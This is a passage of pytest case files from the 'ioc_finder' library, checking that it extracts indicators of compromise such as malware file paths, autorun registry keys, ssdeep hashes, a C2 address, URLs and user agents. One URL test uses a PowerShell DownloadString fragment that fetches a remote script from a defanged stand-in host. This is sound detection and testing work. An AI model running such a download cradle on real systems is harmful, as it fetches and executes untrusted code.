 60 | all_ioc_text = all_ioc_text + " " + " ".join(IOC_EXAMPLES["attack_tactics"]["pre_attack"])  # type: ignore
 61 | all_ioc_text = all_ioc_text + " " + " ".join(IOC_EXAMPLES["attack_techniques"]["pre_attack"])  # type: ignore
 62 | 
 63 | 
 64 | individual_included_ioc_types_tests = []
 65 | 
 66 | for type_ in DEFAULT_IOC_TYPES:
 67 |     individual_included_ioc_types_tests.append(
 68 |         param(
 69 |             all_ioc_text,
 70 |             {type_: IOC_EXAMPLES[type_]},
 71 |             {"included_ioc_types": [type_]},
 72 |             id=f"Only find {type_} with included_ioc_types",
 73 |         )
 74 |     )
 75 | 
 76 | 
 77 | multiple_included_ioc_types_tests = []
 78 | 
 79 | # make sure multiple included_ioc_types are handled properly
 80 | multiple_included_ioc_types_tests.append(
 81 |     param(
 82 |         "https://example.com/test%20page/foo.com/bingo.php?q=bar.com",
 83 |         {
 84 |             "domains": ["bar.com", "example.com", "foo.com"],
 85 |             "urls": ["https://example.com/test%20page/foo.com/bingo.php?q=bar.com"],
 86 |         },
 87 |         {"included_ioc_types": ["domains", "urls"]},
 88 |         id="Find multiple data types",
 89 |     )
 90 | )
 91 | 
 92 | # make sure multiple included_ioc_types work well with other kwargs - the list of domains is missing `foo.com` b/c `parse_from_url_path` is False
 93 | multiple_included_ioc_types_tests.append(
 94 |     param(
 95 |         "https://example.com/test%20page/foo.com/bingo.php?q=bar.com",
 96 |         {
 97 |             "domains": ["bar.com", "example.com"],
 98 |             "urls": ["https://example.com/test%20page/foo.com/bingo.php?q=bar.com"],
 99 |         },
100 |         {"included_ioc_types": ["domains", "urls"], "parse_from_url_path": False},
101 |         id="Find multiple data types",
102 |     )
103 | )
104 | 


--------------------------------------------------------------------------------
/tests/find_iocs_cases/file_paths.py:
--------------------------------------------------------------------------------
 1 | from pytest import param
 2 | 
 3 | PATH_DATA = [
 4 |     param(
 5 |         """C:\\Users\\\\AppData \\Local\\Microsoft\\Windows\\shedaudio.exe
 6 | 
 7 |         C:\\Users\\\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia\\bin\\flashplayer.exe
 8 | 
 9 |         Typical Registry Keys:
10 | 
11 |         HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run
12 | 
13 |         HKEY_LOCAL_MACHINE\\Software\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Run
14 | 
15 |         HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run
16 | 
17 |         System Root Directories:
18 | 
19 |         C:\\Windows\\11987416.exe
20 | 
21 |         C:\\Windows\\System32\\46615275.exe
22 | 
23 |         C:\\Windows\\System32\\shedaudio.exe
24 | 
25 |         C:\\Windows\\SysWOW64\\f9jwqSbS.exe""",
26 |         {
27 |             "file_paths": [
28 |                 "C:\\Users\\\\AppData \\Local\\Microsoft\\Windows\\shedaudio.exe",
29 |                 "C:\\Users\\\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia\\bin\\flashplayer.exe",
30 |                 "C:\\Windows\\11987416.exe",
31 |                 "C:\\Windows\\System32\\46615275.exe",
32 |                 "C:\\Windows\\System32\\shedaudio.exe",
33 |                 "C:\\Windows\\SysWOW64\\f9jwqSbS.exe",
34 |             ],
35 |             "registry_key_paths": [
36 |                 "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run",
37 |                 "HKEY_LOCAL_MACHINE\\Software\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Run",
38 |                 "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run",
39 |             ],
40 |         },
41 |         {},
42 |         id="file_path_1",
43 |     ),
44 |     param(
45 |         "/Library/Storage/File System/HFS/25cf5d02-e50b-4288-870a-528d56c3cf6e/pivtoken.appex",
46 |         {"file_paths": ["/Library/Storage/File System/HFS/25cf5d02-e50b-4288-870a-528d56c3cf6e/pivtoken.appex"]},
47 |         {},
48 |         id="file_path_2",
49 |     ),
50 |     param(
51 |         "and this is a file ~/foo/bar/abc.py",
52 |         {"file_paths": ["~/foo/bar/abc.py"], "domains": ["abc.py"]},
53 |         {},
54 |         id="file_path_3",
55 |     ),
56 |     param(
57 |         "test /Library/Storage/File System/HFS/25cf5d02-e50b-4288-870a-528d56c3cf6e/pivtoken.appex file",
58 |         {"file_paths": ["/Library/Storage/File System/HFS/25cf5d02-e50b-4288-870a-528d56c3cf6e/pivtoken.appex"]},
59 |         {},
60 |         id="file_path_4",
61 |     ),
62 |     param(
63 |         "another home directory ~/Desktop/test.py python file",
64 |         {"file_paths": ["~/Desktop/test.py"], "domains": ["test.py"]},
65 |         {},
66 |         id="file_path_5",
67 |     ),
68 |     # param(
69 |     #     "/Library/Storage/File System/HFS/25cf5d02-e50b-4288-870a-528d56c3cf6e/pivtoken.appex",
70 |     #     {'file_paths': ["/Library/Storage/File System/HFS/25cf5d02-e50b-4288-870a-528d56c3cf6e/pivtoken.appex"]},
71 |     #     {},
72 |     #     id="file_path_2"
73 |     # )
74 | ]
75 | 


--------------------------------------------------------------------------------
/tests/find_iocs_cases/hashes.py:
--------------------------------------------------------------------------------
  1 | from pytest import param
  2 | 
  3 | HASH_DATA = [
  4 |     param(
  5 |         "{} {} {} {} {}".format("A" * 32, "a" * 32, "b" * 40, "c" * 64, "d" * 128),
  6 |         {
  7 |             "md5s": ["aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"],
  8 |             "sha1s": ["bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb"],
  9 |             "sha256s": ["cccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccc"],
 10 |             "sha512s": [
 11 |                 "dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd"
 12 |             ],
 13 |         },
 14 |         {},
 15 |         id="random_hash_1",
 16 |     ),
 17 |     param(
 18 |         "1536:yB+A8bMtMeRlbIzvDqZL4QzNxVDm+5gt+M2hDDDvNZ3YZ7sU:N4tMsbOGcyrV6BQvnoZ4U",
 19 |         {"ssdeeps": ["1536:yB+A8bMtMeRlbIzvDqZL4QzNxVDm+5gt+M2hDDDvNZ3YZ7sU:N4tMsbOGcyrV6BQvnoZ4U"]},
 20 |         {},
 21 |         id="ssdeep_1",
 22 |     ),
 23 |     param(
 24 |         "ahdfadsfa 1536:yB+A8bMtMeRlbIzvDqZL4QzNxVDm+5gt+M2hDDDvNZ3YZ7sU:N4tMsbOGcyrV6BQvnoZ4U,000/000/000000001 adfasf",
 25 |         {"ssdeeps": ["1536:yB+A8bMtMeRlbIzvDqZL4QzNxVDm+5gt+M2hDDDvNZ3YZ7sU:N4tMsbOGcyrV6BQvnoZ4U"]},
 26 |         {},
 27 |         id="ssdeep_2",
 28 |     ),
 29 |     param(
 30 |         """c2b257868686c861d43c6cf3de146b8812778c8283f7d
 31 |         Threat  Zepakab/Zebrocy Downloader
 32 |         ssdeep  12288:QYV6MorX7qzuC3QHO9FQVHPF51jgcSj2EtPo/V7I6R+Lqaw8i6hG0:vBXu9HGaVHh4Po/VU6RkqaQ6F""",
 33 |         {"ssdeeps": ["12288:QYV6MorX7qzuC3QHO9FQVHPF51jgcSj2EtPo/V7I6R+Lqaw8i6hG0:vBXu9HGaVHh4Po/VU6RkqaQ6F"]},
 34 |         {},
 35 |         id="ssdeep_3",
 36 |     ),
 37 |     param(
 38 |         """393216:EW/eKCo9QgoHfHYebwoyC0QStQYEb+G8j3wfVOglnimQyCK+mteYREDWXKF2b:MKg3lbwoyCnCkNHlnimfCSQx8b,"000/000/000000001"
 39 |         196608:AGSE26mYSK0iwH8HW9TDl0vnvCZwZEkzzeap7R:Ak28siwH8eRSn25k3eg,"000/000/000000002"
 40 |         98304:O1OCzezOgr4XMP7Af0+Kh7MzplFKuu5XcS9QnCD/VWR6yf4OB6S/mwRTwjf0ih87:k/Y4XMT7YguEXqCD/VWR6yf4Ux/mwR0S,"000/000/000000003"
 41 |         96:ukILJhn54RewghSib4xGEHVLFNs+4tihJW6jJenUQrsIvpMMjUg:uk0Jx54usxJHh4gJrJenUQrs2pvIg,"000/000/000000004"
 42 |         196608:rNI4QlKQbWQobu0u3QRBBibfv+Z4Hjy5M+IjunAadLLtt42fAtQSqFhx:rNkK2obu0uBb3K4H28yAGc4RSax,"000/000/000000005"
 43 |         1536:mFbhArcCMbR0S/kjzU6El4mUIR2JPmvY3lpKa38fTXcTns+b3tfZyCLtRs:obNCMbWpU6SzFAPV3lpCjCsQRZyQt6,"000/000/000000006"
 44 |         48:CScrEd3jk5BsRSFCWfVsEWABbbpnWSgSX45dc6b5Qla9A+o5R6k7CyNRD5J:XcrEdzHRSFr9sE7XnsDe1CyNRNJ,"000/000/000000007"
 45 |         24:N8Rw5AF4REesFtPP6k216xoWya1oxOKHHwa8peRK8FdigZY5tODrRRK8RfMfde8:N8Rw5AF4+XPyooa2EKnwaGeRJFYpfwzQ,"000/000/000000008"
 46 |         1536:yB+A8bMtMeRlbIzvDqZL4QzNxVDm+5gt+M2hDDDvNZ3YZ7sU:N4tMsbOGcyrV6BQvnoZ4U,"000/000/000000009""",
 47 |         {
 48 |             "ssdeeps": [
 49 |                 "393216:EW/eKCo9QgoHfHYebwoyC0QStQYEb+G8j3wfVOglnimQyCK+mteYREDWXKF2b:MKg3lbwoyCnCkNHlnimfCSQx8b",
 50 |                 "196608:AGSE26mYSK0iwH8HW9TDl0vnvCZwZEkzzeap7R:Ak28siwH8eRSn25k3eg",
 51 |                 "98304:O1OCzezOgr4XMP7Af0+Kh7MzplFKuu5XcS9QnCD/VWR6yf4OB6S/mwRTwjf0ih87:k/Y4XMT7YguEXqCD/VWR6yf4Ux/mwR0S",
 52 |                 "96:ukILJhn54RewghSib4xGEHVLFNs+4tihJW6jJenUQrsIvpMMjUg:uk0Jx54usxJHh4gJrJenUQrs2pvIg",
 53 |                 "1536:mFbhArcCMbR0S/kjzU6El4mUIR2JPmvY3lpKa38fTXcTns+b3tfZyCLtRs:obNCMbWpU6SzFAPV3lpCjCsQRZyQt6",
 54 |                 "48:CScrEd3jk5BsRSFCWfVsEWABbbpnWSgSX45dc6b5Qla9A+o5R6k7CyNRD5J:XcrEdzHRSFr9sE7XnsDe1CyNRNJ",
 55 |                 "24:N8Rw5AF4REesFtPP6k216xoWya1oxOKHHwa8peRK8FdigZY5tODrRRK8RfMfde8:N8Rw5AF4+XPyooa2EKnwaGeRJFYpfwzQ",
 56 |                 "1536:yB+A8bMtMeRlbIzvDqZL4QzNxVDm+5gt+M2hDDDvNZ3YZ7sU:N4tMsbOGcyrV6BQvnoZ4U",
 57 |                 "196608:rNI4QlKQbWQobu0u3QRBBibfv+Z4Hjy5M+IjunAadLLtt42fAtQSqFhx:rNkK2obu0uBb3K4H28yAGc4RSax",
 58 |             ]
 59 |         },
 60 |         {},
 61 |         id="ssdeep_4",
 62 |     ),
 63 |     param(
 64 |         """SHA-256 093e394933c4545ba7019f511961b9a5ab91156cf791f45de074acad03d1a44a
 65 |         Dropper imphash: 18ddf28a71089acdbab5038f58044c0a
 66 |         C2 IP: 210.209.127.8:443
 67 |         imphash: 18ddf28a71089acdbab5038f58044c0a
 68 |         imphash 18ddf28a71089acdbab5038f58044c0a
 69 |         imphash  18ddf28a71089acdbab5038f58044c0a
 70 |         imphash:     18ddf28a71089acdbab5038f58044c0a
 71 |         imphash\t18ddf28a71089acdbab5038f58044c0a
 72 |         imphash\n18ddf28a71089acdbab5038f58044c0a
 73 |         imphash - 18ddf28a71089acdbab5038f58044c0a""",
 74 |         {
 75 |             "imphashes": [
 76 |                 "18ddf28a71089acdbab5038f58044c0a",
 77 |                 "18ddf28a71089acdbab5038f58044c0a",
 78 |                 "18ddf28a71089acdbab5038f58044c0a",
 79 |             ],
 80 |             "ipv4s": ["210.209.127.8"],
 81 |             "sha256s": ["093e394933c4545ba7019f511961b9a5ab91156cf791f45de074acad03d1a44a"],
 82 |         },
 83 |         {},
 84 |         id="imphash_1",
 85 |     ),
 86 |     param(
 87 |         """SHA-256 093e394933c4545ba7019f511961b9a5ab91156cf791f45de074acad03d1a44a
 88 |         Dropper import hash: 18ddf28a71089acdbab5038f58044c0a
 89 |         C2 IP: 210.209.127.8:443
 90 |         import hash: 18ddf28a71089acdbab5038f58044c0a
 91 |         import hash 18ddf28a71089acdbab5038f58044c0a
 92 |         import hash  18ddf28a71089acdbab5038f58044c0a
 93 |         import hash:     18ddf28a71089acdbab5038f58044c0a
 94 |         import hash\t18ddf28a71089acdbab5038f58044c0a
 95 |         import hash\n18ddf28a71089acdbab5038f58044c0a
 96 |         import hash - 18ddf28a71089acdbab5038f58044c0a""",
 97 |         {
 98 |             "imphashes": [
 99 |                 "18ddf28a71089acdbab5038f58044c0a",
100 |                 "18ddf28a71089acdbab5038f58044c0a",
101 |                 "18ddf28a71089acdbab5038f58044c0a",
102 |             ],
103 |             "ipv4s": ["210.209.127.8"],
104 |             "sha256s": ["093e394933c4545ba7019f511961b9a5ab91156cf791f45de074acad03d1a44a"],
105 |         },
106 |         {},
107 |         id="imphash_3",
108 |     ),
109 |     param(
110 |         """SHA-256 093e394933c4545ba7019f511961b9a5ab91156cf791f45de074acad03d1a44a
111 |         Dropper IMPORT HASH: 18ddf28a71089acdbab5038f58044c0a
112 |         C2 IP: 210.209.127.8:443
113 |         IMPORT HASH: 18ddf28a71089acdbab5038f58044c0a
114 |         IMPORT HASH 18ddf28a71089acdbab5038f58044c0a
115 |         IMPORT HASH  18ddf28a71089acdbab5038f58044c0a
116 |         IMPORT HASH:     18ddf28a71089acdbab5038f58044c0a
117 |         IMPORT HASH\t18ddf28a71089acdbab5038f58044c0a
118 |         IMPORT HASH\n18ddf28a71089acdbab5038f58044c0a
119 |         IMPORT HASH - 18ddf28a71089acdbab5038f58044c0a""",
120 |         {
121 |             "imphashes": [
122 |                 "18ddf28a71089acdbab5038f58044c0a",
123 |                 "18ddf28a71089acdbab5038f58044c0a",
124 |                 "18ddf28a71089acdbab5038f58044c0a",
125 |             ],
126 |             "ipv4s": ["210.209.127.8"],
127 |             "sha256s": ["093e394933c4545ba7019f511961b9a5ab91156cf791f45de074acad03d1a44a"],
128 |         },
129 |         {},
130 |         id="imphash_4",
131 |     ),
132 |     param(
133 |         """
134 |         authentihash 3f1b149d07e7e8636636b8b7f7043c40ed64a10b28986181fb046c498432c2d4',
135 |         authentihash   3f1b149d07e7e8636636b8b7f7043c40ed64a10b28986181fb046c498432c2d4',
136 |         authentihash: 3f1b149d07e7e8636636b8b7f7043c40ed64a10b28986181fb046c498432c2d4',
137 |         authentihash:     3f1b149d07e7e8636636b8b7f7043c40ed64a10b28986181fb046c498432c2d4',
138 |         authentihash - 3f1b149d07e7e8636636b8b7f7043c40ed64a10b28986181fb046c498432c2d4',
139 |         authentihash-3f1b149d07e7e8636636b8b7f7043c40ed64a10b28986181fb046c498432c2d4',
140 |         authentihash\t3f1b149d07e7e8636636b8b7f7043c40ed64a10b28986181fb046c498432c2d4',
141 |         authentihash\n3f1b149d07e7e8636636b8b7f7043c40ed64a10b28986181fb046c498432c2d4',
142 |         """,
143 |         {
144 |             "authentihashes": [
145 |                 "3f1b149d07e7e8636636b8b7f7043c40ed64a10b28986181fb046c498432c2d4",
146 |                 "3f1b149d07e7e8636636b8b7f7043c40ed64a10b28986181fb046c498432c2d4",
147 |                 "3f1b149d07e7e8636636b8b7f7043c40ed64a10b28986181fb046c498432c2d4",
148 |             ]
149 |         },
150 |         {},
151 |         id="authentihash_1",
152 |     ),
153 |     param(
154 |         """
155 |         AUTHENTIHASH 3f1b149d07e7e8636636b8b7f7043c40ed64a10b28986181fb046c498432c2d4',
156 |         AUTHENTIHASH   3f1b149d07e7e8636636b8b7f7043c40ed64a10b28986181fb046c498432c2d4',
157 |         AUTHENTIHASH: 3f1b149d07e7e8636636b8b7f7043c40ed64a10b28986181fb046c498432c2d4',
158 |         AUTHENTIHASH:     3f1b149d07e7e8636636b8b7f7043c40ed64a10b28986181fb046c498432c2d4',
159 |         AUTHENTIHASH - 3f1b149d07e7e8636636b8b7f7043c40ed64a10b28986181fb046c498432c2d4',
160 |         AUTHENTIHASH-3f1b149d07e7e8636636b8b7f7043c40ed64a10b28986181fb046c498432c2d4',
161 |         AUTHENTIHASH\t3f1b149d07e7e8636636b8b7f7043c40ed64a10b28986181fb046c498432c2d4',
162 |         AUTHENTIHASH\n3f1b149d07e7e8636636b8b7f7043c40ed64a10b28986181fb046c498432c2d4',
163 |         """,
164 |         {
165 |             "authentihashes": [
166 |                 "3f1b149d07e7e8636636b8b7f7043c40ed64a10b28986181fb046c498432c2d4",
167 |                 "3f1b149d07e7e8636636b8b7f7043c40ed64a10b28986181fb046c498432c2d4",
168 |                 "3f1b149d07e7e8636636b8b7f7043c40ed64a10b28986181fb046c498432c2d4",
169 |             ]
170 |         },
171 |         {},
172 |         id="authentihash_2",
173 |     ),
174 | ]
175 | 


--------------------------------------------------------------------------------
/tests/find_iocs_cases/ids.py:
--------------------------------------------------------------------------------
 1 | from pytest import param
 2 | 
 3 | ID_DATA = [
 4 |     param(
 5 |         "pub-1234567891234567",
 6 |         {"google_adsense_publisher_ids": ["pub-1234567891234567"]},
 7 |         {},
 8 |         id="google_publisher_id_1",
 9 |     ),
10 |     param(
11 |         " pub-1234567891234567 pub-9383614236930773 ",
12 |         {"google_adsense_publisher_ids": ["pub-1234567891234567", "pub-9383614236930773"]},
13 |         {},
14 |         id="google_publisher_id_2",
15 |     ),
16 |     param(
17 |         " UA-000000-2 ", {"google_analytics_tracker_ids": ["UA-000000-2"]}, {}, id="google_analytics_id_1"
18 |     ),
19 |     param(
20 |         "UA-000000-2 UA-00000000-99",
21 |         {"google_analytics_tracker_ids": ["UA-000000-2", "UA-00000000-99"]},
22 |         {},
23 |         id="google_publisher_id_2",
24 |     ),
25 | ]
26 | 


--------------------------------------------------------------------------------
/tests/find_iocs_cases/ip_addr.py:
--------------------------------------------------------------------------------
 1 | from pytest import param
 2 | 
 3 | IP_DATA = [
 4 |     param(
 5 |         "this is just a (1.2.3.54) test of 255.255.1.255 255.256.344.1",
 6 |         {"ipv4s": ["1.2.3.54", "255.255.1.255"]},
 7 |         {},
 8 |         id="ipv4_1",
 9 |     ),
10 |     param(
11 |         "2001:0db8:0000:0000:0000:ff00:0042:8329 testing 2001:db8:0:0:0:ff00:42:8329 shfaldkafsdfa 2001:db8::ff00:42:8329 asdfadfas afkj;fl ::1 kljfkadf 1:1 ",
12 |         {
13 |             "ipv6s": [
14 |                 "2001:0db8:0000:0000:0000:ff00:0042:8329",
15 |                 "2001:db8:0:0:0:ff00:42:8329",
16 |                 "2001:db8::ff00:42:8329",
17 |                 "::1",
18 |             ],
19 |             "ssdeeps": ["0000:0000:ff00", "2001:0db8:0000"],
20 |         },
21 |         {},
22 |         id="ipv6_1",
23 |     ),
24 |     param(
25 |         "1.2.3.4/0 1.2.3.4/10 1.2.3.4/20 1.2.3.4/32",
26 |         {"ipv4_cidrs": ["1.2.3.4/0", "1.2.3.4/10", "1.2.3.4/20", "1.2.3.4/32"], "ipv4s": {"1.2.3.4"}},
27 |         {},
28 |         id="ipv4_cidr1_1",
29 |     ),
30 | ]
31 | 


--------------------------------------------------------------------------------
/tests/find_iocs_cases/mac_addr.py:
--------------------------------------------------------------------------------
 1 | from pytest import param
 2 | 
 3 | MAC_DATA = [
 4 |     param(
 5 |         "AA-F2-C9-A6-B3-4F AB:F2:C9:A6:B3:4F ACF2.C9A6.B34F",
 6 |         {"mac_addresses": ["AA-F2-C9-A6-B3-4F", "AB:F2:C9:A6:B3:4F", "ACF2.C9A6.B34F"]},
 7 |         {},
 8 |         id="mac_1",
 9 |     ),
10 |     param(
11 |         "aa-f2-c9-a6-b3-4f ab:f2:c9:a6:b3:4f acf2.c9a6.b34f",
12 |         {"mac_addresses": ["aa-f2-c9-a6-b3-4f", "ab:f2:c9:a6:b3:4f", "acf2.c9a6.b34f"]},
13 |         {},
14 |         id="mac_2",
15 |     ),
16 | ]
17 | 


--------------------------------------------------------------------------------
/tests/find_iocs_cases/tlp_labels.py:
--------------------------------------------------------------------------------
1 | from pytest import param
2 | 
3 | TLP_DATA = [
4 |     param("tlp amber and TLP:RED", {"tlp_labels": ["TLP:RED", "TLP:AMBER"]}, {}, id="tlp_1"),
5 |     param("tlp-Amber and TLPRED TlpGreen", {"tlp_labels": ["TLP:RED", "TLP:AMBER", "TLP:GREEN"]}, {}, id="tlp_2"),
6 | ]
7 | 


--------------------------------------------------------------------------------
/tests/find_iocs_cases/urls.py:
--------------------------------------------------------------------------------
 1 | from pytest import param
 2 | 
 3 | URL_DATA = [
 4 |     param(
 5 |         "https://example.com/test%20page/foo.com/bingo.php?q=bar.com",
 6 |         {
 7 |             "urls": ["https://example.com/test%20page/foo.com/bingo.php?q=bar.com"],
 8 |             "domains": ["bar.com", "foo.com", "example.com"],
 9 |         },
10 |         {},
11 |         id="URL and domains parsed",
12 |     ),
13 |     param(
14 |         "Foo https://citizenlab.ca/about/), bar",
15 |         {
16 |             "urls": ["https://citizenlab.ca/about/"],
17 |         },
18 |         {"parse_domain_from_url": False},
19 |         id="URL boundary w/ ) handled properly",
20 |     ),
21 |     param(
22 |         "DownloadString('https://example[.]com/rdp.ps1');g $I DownloadString(\"https://example[.]com/rdp.ps2\");g $I",
23 |         {
24 |             "urls": ["https://example.com/rdp.ps1", "https://example.com/rdp.ps2"],
25 |         },
26 |         {"parse_domain_from_url": False},
27 |         id="URL boundary w/ single or double quotes handled properly",
28 |     ),
29 |     param(
30 |         "https://example.com/g//foo",
31 |         {
32 |             "urls": ["https://example.com/g//foo"],
33 |         },
34 |         {"parse_domain_from_url": False},
35 |         id="Consecutive slashes handled properly",
36 |     ),
37 | ]
38 | 


--------------------------------------------------------------------------------
/tests/find_iocs_cases/user_agents.py:
--------------------------------------------------------------------------------
 1 | from pytest import param
 2 | 
 3 | UA_DATA = [
 4 |     param(
 5 |         "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1)",
 6 |         {"user_agents": ["Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1)"]},
 7 |         {},
 8 |         id="user_agent_1",
 9 |     ),
10 |     param(
11 |         "mozilla/5.0 (windows nt 6.1; wow64) applewebkit/535.11 (khtml, like gecko) chrome/17.0.963.56 safari/535.11 mozilla/5.0 (windows nt 6.1; wow64; rv:11.0) gecko firefox/11.0",
12 |         {
13 |             "user_agents": [
14 |                 "mozilla/5.0 (windows nt 6.1; wow64) applewebkit/535.11 (khtml, like gecko) chrome/17.0.963.56 safari/535.11",
15 |                 "mozilla/5.0 (windows nt 6.1; wow64; rv:11.0) gecko firefox/11.0",
16 |             ]
17 |         },
18 |         {},
19 |         id="user_agent_2",
20 |     ),
21 |     param(
22 |         "Mozilla/5.0 (Windows nt 6.1; wow64) Applewebkit/535.11 (khtml, like Gecko) Chrome/17.0.963.56 Safari/535.11 Mozilla/5.0 (Windows nt 6.1; wow64; rv:11.0) Gecko Firefox/11.0",
23 |         {
24 |             "user_agents": [
25 |                 "Mozilla/5.0 (Windows nt 6.1; wow64) Applewebkit/535.11 (khtml, like Gecko) Chrome/17.0.963.56 Safari/535.11",
26 |                 "Mozilla/5.0 (Windows nt 6.1; wow64; rv:11.0) Gecko Firefox/11.0",
27 |             ]
28 |         },
29 |         {},
30 |         id="user_agent_3",
31 |     ),
32 | ]
33 | 


--------------------------------------------------------------------------------
/tests/test_cli.py:
--------------------------------------------------------------------------------
  1 | import json
  2 | 
  3 | from click.testing import CliRunner
  4 | 
  5 | from ioc_finder import ioc_finder
  6 | 
  7 | 
  8 | def test_parse_cli_stdin():
  9 |     runner = CliRunner()
 10 |     result = runner.invoke(
 11 |         ioc_finder.cli_find_iocs, input="This is just an example.com https://example.org/test/bingo.php"
 12 |     )
 13 |     assert result.exit_code == 0
 14 |     output = result.output.strip()
 15 |     assert "example.org" in output
 16 |     assert "example.com" in output
 17 |     assert "https://example.org/test/bingo.php" in output
 18 | 
 19 | 
 20 | def test_ioc_parsing_cli():
 21 |     runner = CliRunner()
 22 |     result = runner.invoke(ioc_finder.cli_find_iocs, ["This is just an example.com https://example.org/test/bingo.php"])
 23 |     assert result.exit_code == 0
 24 |     output = result.output.strip()
 25 |     assert "example.org" in output
 26 |     assert "example.com" in output
 27 |     assert "https://example.org/test/bingo.php" in output
 28 | 
 29 | 
 30 | def test_cli_without_domain_from_url_parsing():
 31 |     runner = CliRunner()
 32 |     result = runner.invoke(
 33 |         ioc_finder.cli_find_iocs,
 34 |         ["This is just an example.com https://example.org/test/bingo.php", "--no_url_domain_parsing"],
 35 |     )
 36 |     assert result.exit_code == 0
 37 |     print(result.output.strip())
 38 |     assert (
 39 |         result.output.strip()
 40 |         == """{
 41 |     "asns": [],
 42 |     "attack_mitigations": {
 43 |         "enterprise": [],
 44 |         "mobile": []
 45 |     },
 46 |     "attack_tactics": {
 47 |         "enterprise": [],
 48 |         "mobile": [],
 49 |         "pre_attack": []
 50 |     },
 51 |     "attack_techniques": {
 52 |         "enterprise": [],
 53 |         "mobile": [],
 54 |         "pre_attack": []
 55 |     },
 56 |     "authentihashes": [],
 57 |     "bitcoin_addresses": [],
 58 |     "cves": [],
 59 |     "domains": [
 60 |         "example.com"
 61 |     ],
 62 |     "email_addresses": [],
 63 |     "email_addresses_complete": [],
 64 |     "file_paths": [],
 65 |     "google_adsense_publisher_ids": [],
 66 |     "google_analytics_tracker_ids": [],
 67 |     "imphashes": [],
 68 |     "ipv4_cidrs": [],
 69 |     "ipv4s": [],
 70 |     "ipv6s": [],
 71 |     "mac_addresses": [],
 72 |     "md5s": [],
 73 |     "monero_addresses": [],
 74 |     "registry_key_paths": [],
 75 |     "sha1s": [],
 76 |     "sha256s": [],
 77 |     "sha512s": [],
 78 |     "ssdeeps": [],
 79 |     "tlp_labels": [],
 80 |     "urls": [
 81 |         "https://example.org/test/bingo.php"
 82 |     ],
 83 |     "user_agents": [],
 84 |     "xmpp_addresses": []
 85 | }"""
 86 |     )
 87 | 
 88 | 
 89 | def test_cli_parsing_urls_without_scheme():
 90 |     runner = CliRunner()
 91 |     result = runner.invoke(ioc_finder.cli_find_iocs, ["This is just an example.com example.org/test/bingo.php"])
 92 |     assert result.exit_code == 0
 93 |     print(result.output.strip())
 94 |     json_results = json.loads(result.output.strip())
 95 |     assert "example.com" in json_results["domains"]
 96 |     assert "example.org" in json_results["domains"]
 97 |     assert "example.org/test/bingo.php" in json_results["urls"]
 98 | 
 99 | 
100 | def test_cli_disabling_parsing_urls_without_scheme():
101 |     runner = CliRunner()
102 |     result = runner.invoke(
103 |         ioc_finder.cli_find_iocs,
104 |         ["This is just an example.com example.org/test/bingo.php", "--parse_urls_without_scheme"],
105 |     )
106 |     assert result.exit_code == 0
107 |     print(result.output.strip())
108 |     json_results = json.loads(result.output.strip())
109 |     assert "example.com" in json_results["domains"]
110 |     assert "example.org" in json_results["domains"]
111 | 
112 | 
113 | def test_cli_disabling_import_hash_parsing():
114 |     runner = CliRunner()
115 |     result = runner.invoke(ioc_finder.cli_find_iocs, ["imphash 18ddf28a71089acdbab5038f58044c0a", "--no_import_hashes"])
116 |     assert result.exit_code == 0
117 |     json_results = json.loads(result.output.strip())
118 |     # even if we don't parse imphashes, they are still removed so they aren't parsed as md5s
119 |     assert json_results["md5s"] == []
120 |     assert not json_results.get("imphashes")
121 | 
122 |     result = runner.invoke(ioc_finder.cli_find_iocs, ["imphash 18ddf28a71089acdbab5038f58044c0a"])
123 |     assert result.exit_code == 0
124 |     json_results = json.loads(result.output.strip())
125 |     assert json_results["imphashes"] == ["18ddf28a71089acdbab5038f58044c0a"]
126 | 


--------------------------------------------------------------------------------
/tests/test_concurrency.py:
--------------------------------------------------------------------------------
 1 | import concurrent.futures
 2 | 
 3 | from ioc_finder import find_iocs
 4 | 
 5 | 
 6 | def test_nested_concurrency():
 7 |     texts = ["example.com", "foo bar bang buzz", "This is just an example.com https://example.org/test/bingo.php"]
 8 |     results = []
 9 | 
10 |     with concurrent.futures.ThreadPoolExecutor() as executor:
11 |         results = [i for i in executor.map(find_iocs, texts)]
12 | 
13 |     assert results[0]["domains"] == ["example.com"]
14 |     assert "example.com" in results[2]["domains"]
15 |     assert "example.org" in results[2]["domains"]
16 |     assert results[2]["urls"] == ["https://example.org/test/bingo.php"]
17 | 


--------------------------------------------------------------------------------
/tests/test_edge_cases.py:
--------------------------------------------------------------------------------
  1 | #!/usr/bin/env python3
  2 | 
  3 | import pytest
  4 | 
  5 | from ioc_finder import find_iocs
  6 | 
  7 | 
  8 | @pytest.fixture
  9 | def text_a():
 10 |     """Provide some generic text for the tests below."""
 11 |     return "example.com is a nice domain if you consider http://bad.com/test/bingo.php to be bad. {} {} {} 1.2.3.4 192.64.55.61 bad12312@example.org".format(
 12 |         "a" * 32, "b" * 40, "c" * 64
 13 |     )
 14 | 
 15 | 
 16 | def test_domain_name_with_underscore():
 17 |     # see https://github.com/fhightower/ioc-finder/issues/26
 18 |     s = "o_o.lgms.nl"
 19 |     results = find_iocs(s)
 20 |     assert results["domains"] == ["o_o.lgms.nl"]
 21 | 
 22 |     s = "_jabber._tcp.gmail.com"
 23 |     results = find_iocs(s)
 24 |     assert results["domains"] == ["_jabber._tcp.gmail.com"]
 25 | 
 26 | 
 27 | def test_url_with_underscore_in_subdomain():
 28 |     # see https://github.com/fhightower/ioc-finder/issues/26
 29 |     s = "https://o_o.lgms.nl/"
 30 |     results = find_iocs(s)
